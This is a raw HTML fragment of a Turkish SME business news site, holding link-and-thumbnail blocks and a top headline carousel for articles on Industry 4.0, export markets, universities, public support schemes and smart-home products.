<a href="http://www.kobi-efor.com.tr/teknoloji/isletmelerde-sanayi-40-devrimi-bilisim-teknolojileri-ve-endustrinin-bulusmasi-h7014.html" title="İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/isletmelerde_sanayi_40_devrimi_bilisim_teknolojileri_ve_endustrinin_bulusmasi_h7014_88bce.jpg" alt="İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması" />
<b>İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/bilisim/imalatci-kobilerde-elektriksellesme-bilisimle-donusum-h6928.html" title="İmalatçı KOBİlerde elektrikselleşme; Bilişimle Dönüşüm"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/imalatci_kobilerde_elektriksellesme_bilisimle_donusum_h6928_e256b.jpg" alt="İmalatçı KOBİlerde elektrikselleşme; Bilişimle Dönüşüm" />
<b>İmalatçı KOBİ’lerde elektrikselleşme; Bilişim’le Dönüşüm</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/sigortamnet-ve-petrol-ofisinden-firsat-h6988.html" title="Sigortam.net ve Petrol Ofisinden fırsat"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sigortamnet_ve_petrol_ofisinden_firsat_h6988_ec3e8.jpg" alt="Sigortam.net ve Petrol Ofisinden fırsat" />
<b>Sigortam.net ve Petrol Ofisi’nden fırsat</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/sigorta/sigorta-cininden-kasko-ve-trafik-sigortasina-60-tl-akaryakit-hediyesi-h6989.html" title="Sigorta Cininden Kasko ve Trafik Sigortasına 60 TL akaryakıt hediyesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sigorta_cininden_kasko_ve_trafik_sigortasina_60_tl_akaryakit_hediyesi_h6989_c0032.jpg" alt="Sigorta Cininden Kasko ve Trafik Sigortasına 60 TL akaryakıt hediyesi" />
<b>Sigorta Cini’nden Kasko ve Trafik Sigortası’na 60 TL akaryakıt hediyesi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sigorta/vakif-emeklilik-finansal-okuryazarligi-destekliyor-h6987.html" title="Vakıf Emeklilik, Finansal Okuryazarlığı” destekliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/vakif_emeklilik_finansal_okuryazarligi_destekliyor_h6987_5cff3.jpg" alt="Vakıf Emeklilik, Finansal Okuryazarlığı” destekliyor" />
<b>Vakıf Emeklilik, “Finansal Okuryazarlığı” destekliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/bilisim/teknoloji-cagindayiz-kobiler-bulutta-buyusun-h6851.html" title="Teknoloji çağındayız: KOBİler ‘Bulutta büyüsün"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/teknoloji_cagindayiz_kobiler_bulutta_buyusun_h6851_d4d90.jpg" alt="Teknoloji çağındayız: KOBİler ‘Bulutta büyüsün" />
<b>Teknoloji çağındayız: KOBİ’ler ‘Bulut’ta büyüsün</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/lojistik/fleetcorp-2021de-3-milyar-tl-aktif-buyukluk-hedefliyor-h6846.html" title="Fleetcorp 2021de 3 milyar TL aktif büyüklük hedefliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fleetcorp_2021de_3_milyar_tl_aktif_buyukluk_hedefliyor_h6846_b7d1d.jpg" alt="Fleetcorp 2021de 3 milyar TL aktif büyüklük hedefliyor" />
<b>Fleetcorp 2021’de 3 milyar TL aktif büyüklük hedefliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/safiporttan-yeni-terminal-yatirimi-h6847.html" title="Safiporttan yeni terminal yatırımı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/safiporttan_yeni_terminal_yatirimi_h6847_87b0e.jpg" alt="Safiporttan yeni terminal yatırımı" />
<b>Safiport’tan yeni terminal yatırımı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/thy-philips-kulakliklarla-ucuruyor-h6848.html" title="THY Philips kulaklıklarla uçuruyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/thy_philips_kulakliklarla_ucuruyor_h6848_54656.jpg" alt="THY Philips kulaklıklarla uçuruyor" />
<b>THY Philips kulaklıklarla uçuruyor</b></a>
</div>
</div></div><div class="katelement kat_k5">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/baku-tiflis-kars-demiryolu-btkd-tarih-yazacak-yeni-ekonomik-bolge-h7024.html" title="Bakü Tiflis Kars Demiryolu (BTKD) tarih yazacak; YENİ EKONOMİK BÖLGE"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/baku_tiflis_kars_demiryolu_btkd_tarih_yazacak_yeni_ekonomik_bolge_h7024_a6134.jpg" alt="Bakü Tiflis Kars Demiryolu (BTKD) tarih yazacak; YENİ EKONOMİK BÖLGE" />
<b>Bakü Tiflis Kars Demiryolu (BTKD) tarih yazacak; YENİ EKONOMİK BÖLGE</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/girisimcimiz-icin-elverisli-yeni-alternatif-sirbistan-h6930.html" title="Girişimcimiz için elverişli yeni  alternatif; SIRBİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/girisimcimiz_icin_elverisli_yeni_alternatif_sirbistan_h6930_6b596.jpg" alt="Girişimcimiz için elverişli yeni  alternatif; SIRBİSTAN" />
<b>Girişimcimiz için elverişli yeni  alternatif; SIRBİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/almanyanin-ekonomi-merkezi-kuzey-ren-vestfalya-nordrhein-westfalen-nrw-h6860.html" title="Almanyanın ekonomi merkezi; Kuzey Ren-Vestfalya (Nordrhein-Westfalen-NRW)"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/almanyanin_ekonomi_merkezi_kuzey_ren_vestfalya_nordrhein_westfalen_nrw_h6860_65bc8.jpg" alt="Almanyanın ekonomi merkezi; Kuzey Ren-Vestfalya (Nordrhein-Westfalen-NRW)" />
<b>Almanya’nın ekonomi merkezi; Kuzey Ren-Vestfalya (Nordrhein-Westfalen-NRW)</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/geliskin-ekonomilerin-ilk-uc-ayagindan-biri-japonya-h6735.html" title="Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/geliskin_ekonomilerin_ilk_uc_ayagindan_biri_japonya_h6735_20d0d.jpg" alt="Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA" />
<b>Gelişkin ekonomilerin ilk üç ayağından biri; JAPONYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiye-icin-stratejik-ekonomik-partner-endonezya-h6598.html" title="Türkiye için stratejik ekonomik partner ENDONEZYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_icin_stratejik_ekonomik_partner_endonezya_h6598_ae333.jpg" alt="Türkiye için stratejik ekonomik partner ENDONEZYA" />
<b>Türkiye için stratejik ekonomik partner ENDONEZYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turk-kobilerine-onyargisiz-ulke-arnavutluk-h6525.html" title="Türk KOBİlerine önyargısız  ülke ARNAVUTLUK"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_kobilerine_onyargisiz_ulke_arnavutluk_h6525_5283b.jpg" alt="Türk KOBİlerine önyargısız  ülke ARNAVUTLUK" />
<b>Türk KOBİ’lerine önyargısız  ülke ARNAVUTLUK</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-neredeyse-disinda-kaldigi-abd-pazari-h6408.html" title="Türkiyenin, neredeyse dışında kaldığı ABD PAZARI"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_neredeyse_disinda_kaldigi_abd_pazari_h6408_3ab8a.jpg" alt="Türkiyenin, neredeyse dışında kaldığı ABD PAZARI" />
<b>Türkiye’nin, neredeyse dışında kaldığı ABD PAZARI</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6496.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uluslararasi_ticaret_ve_isbirligi_teklifleri_h6496_b2b64.jpg" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimizin-disine-uygun-bir-pazar-ukrayna-h6313.html" title="KOBİlerimizin dişine uygun bir Pazar UKRAYNA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerimizin_disine_uygun_bir_pazar_ukrayna_h6313_09432.jpg" alt="KOBİlerimizin dişine uygun bir Pazar UKRAYNA" />
<b>KOBİ’lerimizin dişine uygun bir Pazar UKRAYNA</b></a>
</div>
</div></div><div class="katelement kat_k44">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/kocaeli-universitesi-bolgesinin-lideri-olacak-h7027.html" title="Kocaeli Üniversitesi bölgesinin lideri olacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kocaeli_universitesi_bolgesinin_lideri_olacak_h7027_835a4.jpg" alt="Kocaeli Üniversitesi bölgesinin lideri olacak" />
<b>Kocaeli Üniversitesi bölgesinin lideri olacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/kordsa-ve-sabanci-universitesinin-ortak-projesine-abden-3-milyon-avro-destek-h7069.html" title="Kordsa ve Sabancı Üniversitesinin ortak projesine ABden 3 milyon avro destek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kordsa_ve_sabanci_universitesinin_ortak_projesine_abden_3_milyon_avro_destek_h7069_4369a.jpg" alt="Kordsa ve Sabancı Üniversitesinin ortak projesine ABden 3 milyon avro destek" />
<b>Kordsa ve Sabancı Üniversitesi’nin ortak projesine AB’den 3 milyon avro destek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/ilk-isim-girisim-yarismasi-sonuclandi-h7071.html" title="İlk İşim Girişim” yarışması sonuçlandı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ilk_isim_girisim_yarismasi_sonuclandi_h7071_a3668.jpg" alt="İlk İşim Girişim” yarışması sonuçlandı" />
<b>“İlk İşim Girişim” yarışması sonuçlandı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/turkiye-is-bankasi-93-ogrenciyi-odullendirdi-h7070.html" title="Türkiye İş Bankası, 93 öğrenciyi ödüllendirdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_is_bankasi_93_ogrenciyi_odullendirdi_h7070_c2916.jpg" alt="Türkiye İş Bankası, 93 öğrenciyi ödüllendirdi" />
<b>Türkiye İş Bankası, 93 öğrenciyi ödüllendirdi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/itu-seme-yogun-ilgi-h7068.html" title="İTÜ SEMe yoğun ilgi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/itu_seme_yogun_ilgi_h7068_0f661.jpg" alt="İTÜ SEMe yoğun ilgi" />
<b>İTÜ SEM’e yoğun ilgi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/gtu-akademik-yil-acilisinda-basbakan-yardimcisi-fikri-isik-konustu-h6935.html" title="GTÜ Akademik Yıl Açılışında Başbakan Yardımcısı Fikri Işık konuştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gtu_akademik_yil_acilisinda_konusan_basbakan_yardimcisi_fikri_isik_ulkelerin_yarin_nerede_olacagini_bilim_ve_teknolojiye_yaptiklari_yatirim_belirler_h6935_934d9.jpg" alt="GTÜ Akademik Yıl Açılışında Başbakan Yardımcısı Fikri Işık konuştu" />
<b>GTÜ Akademik Yıl Açılışı’nda Başbakan Yardımcısı Fikri Işık konuştu</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/turkiyenin-10-ar-ge-universitesi-arasinda-erciyes-universitesi-h6932.html" title="Türkiyenin 10 Ar-Ge üniversitesi arasında: Erciyes Üniversitesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_10_ar_ge_universitesi_arasinda_erciyes_universitesi_h6932_3634a.jpg" alt="Türkiyenin 10 Ar-Ge üniversitesi arasında: Erciyes Üniversitesi" />
<b>Türkiye’nin 10 Ar-Ge üniversitesi arasında: Erciyes Üniversitesi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/tezmaksan-akademi-cnc-sektorunde-once-ogretmenleri-egitecek-h6975.html" title="Tezmaksan Akademi, CNC sektöründe önce öğretmenleri eğitecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tezmaksan_akademi_cnc_sektorunde_once_ogretmenleri_egitecek_h6975_0072b.jpg" alt="Tezmaksan Akademi, CNC sektöründe önce öğretmenleri eğitecek" />
<b>Tezmaksan Akademi, CNC sektöründe önce öğretmenleri eğitecek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/turk-telekom-ve-mit-sloan-isbirligi-mezunlarini-verdi-h6972.html" title="Türk Telekom ve MIT Sloan işbirliği, mezunlarını verdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_telekom_ve_mit_sloan_isbirligi_mezunlarini_verdi_h6972_2567c.jpg" alt="Türk Telekom ve MIT Sloan işbirliği, mezunlarını verdi" />
<b>Türk Telekom ve MIT Sloan işbirliği, mezunlarını verdi</b></a>
</div>
</div></div><div class="katelement kat_k45">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destekler-bilime-ve-girisime-itodan-girisimciye-bilgiyi-ticarilestirme-merkezi-h7022.html" title="Destekler ‘Bilime ve ‘Girişime İTOdan Girişimciye; BİLGİYİ TİCARİLEŞTİRME MERKEZİ"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destekler_bilime_ve_girisime_itodan_girisimciye_bilgiyi_ticarilestirme_merkezi_h7022_0bf6e.jpg" alt="Destekler ‘Bilime ve ‘Girişime İTOdan Girişimciye; BİLGİYİ TİCARİLEŞTİRME MERKEZİ" />
<b>Destekler ‘Bilime’ ve ‘Girişime’ İTO’dan Girişimciye; BİLGİYİ TİCARİLEŞTİRME MERKEZİ</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/proje-hibe-destekleri-h6931.html" title="Proje Hibe Destekleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/proje_hibe_destekleri_h6931_f4228.jpg" alt="Proje Hibe Destekleri" />
<b>Proje Hibe Destekleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/muhtelif-destek-kaynaklari-h6850.html" title="Muhtelif destek kaynakları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/muhtelif_destek_kaynaklari_h6850_30e2f.jpg" alt="Muhtelif destek kaynakları" />
<b>Muhtelif destek kaynakları</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/diger-destekler-h6726.html" title="Diğer destekler"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/diger_destekler_h6726_f6921.jpg" alt="Diğer destekler" />
<b>Diğer destekler</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kobilerin-buyume-ekosistemi-kumelenme-h6604.html" title="KOBİlerin büyüme ekosistemi: KÜMELENME"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerin_buyume_ekosistemi_kumelenme_h6604_c5c45.jpg" alt="KOBİlerin büyüme ekosistemi: KÜMELENME" />
<b>KOBİ’lerin büyüme ekosistemi: KÜMELENME</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/kobilere-kamu-destekleri-destek-cok-arastir-bul-h6562.html" title="KOBİlere kamu destekleri; destek çok, araştır bul"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilere_kamu_destekleri_destek_cok_arastir_bul_h6562_9d44e.jpg" alt="KOBİlere kamu destekleri; destek çok, araştır bul" />
<b>KOBİ’lere kamu destekleri; destek çok, araştır bul</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/yuksek-teknoloji-destek-kaynaklari-h6406.html" title="Yüksek Teknoloji Destek Kaynakları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yuksek_teknoloji_destek_kaynaklari_h6406_bf9f9.jpg" alt="Yüksek Teknoloji Destek Kaynakları" />
<b>Yüksek Teknoloji Destek Kaynakları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-ve-tesvik-programlari-h6310.html" title="Destek ve Teşvik programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_ve_tesvik_programlari_h6310_6d6bf.jpg" alt="Destek ve Teşvik programları" />
<b>Destek ve Teşvik programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/haber-degerinde-hatirlatmalar-kamu-destegini-iskalama-h6198.html" title="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/haber_degerinde_hatirlatmalar_kamu_destegini_iskalama_h6198_f94f8.jpg" alt="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA" />
<b>Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA</b></a>
</div>
</div></div><div class="katelement kat_k47">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/sportif-yasami-siklikla-bulusturan-samsung-gear-sport-turkiyede-h7075.html" title="Sportif yaşamı şıklıkla buluşturan Samsung Gear Sport Türkiyede"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sportif_yasami_siklikla_bulusturan_samsung_gear_sport_turkiyede_h7075_f7ff4.jpg" alt="Sportif yaşamı şıklıkla buluşturan Samsung Gear Sport Türkiyede" />
<b>Sportif yaşamı şıklıkla buluşturan Samsung Gear Sport Türkiye’de</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/yuksek-binalara-kone-highrise-minispace-ile-yuksek-konfor-h7072.html" title="Yüksek binalara KONE Highrise Minispace™ ile yüksek konfor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yuksek_binalara_kone_highrise_minispace_ile_yuksek_konfor_h7072_15be3.jpg" alt="Yüksek binalara KONE Highrise Minispace™ ile yüksek konfor" />
<b>Yüksek binalara KONE Highrise Minispace™ ile yüksek konfor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/en-teknolojik-seyahat-arkadasiniz-usbli-valiz-h7074.html" title="En teknolojik seyahat arkadaşınız: USBli valiz"><img src="http://www.kobi-efor.com.tr/images/haberler/" alt="En teknolojik seyahat arkadaşınız: USBli valiz" />
<b>En teknolojik seyahat arkadaşınız: USB’li valiz</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/akilli-sehirlerde-su-yonetimi-icin-yeni-nesil-otomasyon-teknolojisi-h7073.html" title="Akıllı şehirlerde su yönetimi için yeni nesil otomasyon teknolojisi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/akilli_sehirlerde_su_yonetimi_icin_yeni_nesil_otomasyon_teknolojisi_h7073_70f22.jpg" alt="Akıllı şehirlerde su yönetimi için yeni nesil otomasyon teknolojisi" />
<b>Akıllı şehirlerde su yönetimi için yeni nesil otomasyon teknolojisi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/panasonicten-guvenliginizi-dusunen-kablosuz-duman-dedektoru-h6979.html" title="Panasonicten güvenliğinizi düşünen kablosuz duman dedektörü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/panasonicten_guvenliginizi_dusunen_kablosuz_duman_dedektoru_h6979_3da2b.jpg" alt="Panasonicten güvenliğinizi düşünen kablosuz duman dedektörü" />
<b>Panasonic’ten güvenliğinizi düşünen kablosuz duman dedektörü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/is-bankasindan-cocuklara-dijital-kumbara-h6977.html" title="İş Bankasından çocuklara Dijital Kumbara"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/is_bankasindan_cocuklara_dijital_kumbara_h6977_d6522.jpg" alt="İş Bankasından çocuklara Dijital Kumbara" />
<b>İş Bankası’ndan çocuklara Dijital Kumbara</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/cern-daikin-ile-serinlemeye-devam-edecek-h6976.html" title="CERN, Daikin ile serinlemeye devam edecek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cern_daikin_ile_serinlemeye_devam_edecek_h6976_fe48b.jpg" alt="CERN, Daikin ile serinlemeye devam edecek" />
<b>CERN, Daikin ile serinlemeye devam edecek</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/somfy-teknolojisiyle-akilli-eve-adim-atin-h6978.html" title="Somfy teknolojisiyle akıllı eve adım atın"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/somfy_teknolojisiyle_akilli_eve_adim_atin_h6978_26d2f.jpg" alt="Somfy teknolojisiyle akıllı eve adım atın" />
<b>Somfy teknolojisiyle akıllı eve adım atın</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/cerrahide-navigasyon-teknolojisi-h6985.html" title="Cerrahide navigasyon teknolojisi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/cerrahide_navigasyon_teknolojisi_h6985_5952b.jpg" alt="Cerrahide navigasyon teknolojisi" />
<b>Cerrahide navigasyon teknolojisi</b></a>
</div>
</div></div><div class="katelement kat_k46">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/26-kalite-kongresi-ve-2017-turkiye-mukemmellik-odulleri-h7013.html" title="26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dijital_donusume_liderlik_h7013_dd277.jpg" alt="26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri" />
<b>26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/ifs-endustri-gunleri-etkinlikleri-kapsaminda-ankarada-farkli-uretim-metodlarini-anlatti-h7020.html" title="IFS, Endüstri Günleri Etkinlikleri kapsamında Ankarada farklı üretim metodlarını anlattı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ifs_endustri_gunleri_etkinlikleri_kapsaminda_ankarada_farkli_uretim_metodlarini_anlatti_h7020_13c39.jpg" alt="IFS, Endüstri Günleri Etkinlikleri kapsamında Ankarada farklı üretim metodlarını anlattı" />
<b>IFS, Endüstri Günleri Etkinlikleri kapsamında Ankara’da farklı üretim metodlarını anlattı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/dosya/binalarin-kaderi-degisiyor-h7023.html" title="Binaların kaderi değişiyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/binalarin_kaderi_degisiyor_h7023_e99ce.jpg" alt="Binaların kaderi değişiyor" />
<b>Binaların kaderi değişiyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/yakini-okuyamiyorsaniz-trifokal-lens-cozum-olabilir-h7025.html" title="Yakını okuyamıyorsanız trifokal lens çözüm olabilir"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yakini_okuyamiyorsaniz_trifokal_lens_cozum_olabilir_h7025_bd127.jpg" alt="Yakını okuyamıyorsanız trifokal lens çözüm olabilir" />
<b>Yakını okuyamıyorsanız trifokal lens çözüm olabilir</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/altin-cag-anaokulundan-etkili-ogrenme-ortami-reggio-emilia-ile-cocugun-dogasina-uygun-egitim-h7026.html" title="Altın Çağ Anaokulundan etkili öğrenme ortamı: Reggio Emilia ile çocuğun doğasına uygun eğitim"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/altin_cag_anaokulundan_etkili_ogrenme_ortami_reggio_emilia_ile_cocugun_dogasina_uygun_egitim_h7026_a2c3a.jpg" alt="Altın Çağ Anaokulundan etkili öğrenme ortamı: Reggio Emilia ile çocuğun doğasına uygun eğitim" />
<b>Altın Çağ Anaokulu’ndan etkili öğrenme ortamı: Reggio Emilia ile çocuğun doğasına uygun eğitim</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/dr-akkan-suvere-avusturyadan-buyuk-odul-h7028.html" title="Dr. Akkan Suvere Avusturyadan Büyük Ödül"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dr_akkan_suvere_avusturyadan_buyuk_odul_h7028_92de2.jpg" alt="Dr. Akkan Suvere Avusturyadan Büyük Ödül" />
<b>Dr. Akkan Suver’e Avusturya’dan Büyük Ödül</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/karadagin-bar-sehrinde-zeytin-senligi-h7029.html" title="Karadağın Bar Şehrinde Zeytin Şenliği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/karadagin_bar_sehrinde_zeytin_senligi_h7029_9b29a.jpg" alt="Karadağın Bar Şehrinde Zeytin Şenliği" />
<b>Karadağ’ın Bar Şehrinde Zeytin Şenliği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/gagavuzya-turk-isadamlarini-bekliyor-h7030.html" title="Gagavuzya Türk işadamlarını bekliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gagavuzya_turk_isadamlarini_bekliyor_h7030_5ec69.jpg" alt="Gagavuzya Türk işadamlarını bekliyor" />
<b>Gagavuzya Türk işadamlarını bekliyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/tso-platform/trabzon-tso-pakistanda-h7065.html" title="Trabzon TSO  Pakistanda"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/trabzon_tso_pakistanda_h7065_16384.jpg" alt="Trabzon TSO  Pakistanda" />
<b>Trabzon TSO  Pakistan’da</b></a>
</div>
</div></div> 
          </div>
                      </div>
        </div>
<!-- MENU ***************************************************** -->
              <!-- UST MANSET -->
        <div id="ustmanset" class="span12">
          <div class="row-fluid">
          <ul class="thumbnails">
				
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/turkiye-ihracat-haftasi-2017-ekonomiyi-ozetledi-toparlaniyoruz-h7011.html" title="‘Türkiye İhracat Haftası 2017’ ekonomiyi özetledi: “TOPARLANIYORUZ!”" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-turkiye_ihracat_haftasi.jpg" alt="‘Türkiye İhracat Haftası 2017’ ekonomiyi özetledi: “TOPARLANIYORUZ!”"  />
			<div class="caption-line"><p>Türkiye İhracat Haftası 2017</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/ayin-konugu/ankara-valisi-ercan-topaca-ureterek-donusen-ankara-h7012.html" title="Ankara Valisi Ercan Topaca: “Üreterek dönüşen Ankara”" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-ankara_valisi-Ercan_Topaca.jpg" alt="Ankara Valisi Ercan Topaca: “Üreterek dönüşen Ankara”"  />
			<div class="caption-line"><p>Ankara Valisi Ercan Topaca: “Üreterek...</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/26-kalite-kongresi-ve-2017-turkiye-mukemmellik-odulleri-h7013.html" title="26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-kalder_odul_toreni-kalder-kalite_kongresi.jpg" alt="26. Kalite Kongresi ve 2017 Türkiye Mükemmellik Ödülleri"  />
			<div class="caption-line"><p>26. Kalite Kongresi ve Mükemmellik...</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/teknoloji/isletmelerde-sanayi-40-devrimi-bilisim-teknolojileri-ve-endustrinin-bulusmasi-h7014.html" title="İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/ustmanset-akilli_isletmeler.jpg" alt="İşletmelerde Sanayi 4.0 Devrimi; Bilişim teknolojileri ve endüstrinin buluşması"  />
			<div class="caption-line"><p>İşletmelerde Sanayi 4.0 Devrimi</p></div>						</a>
			</li>


		
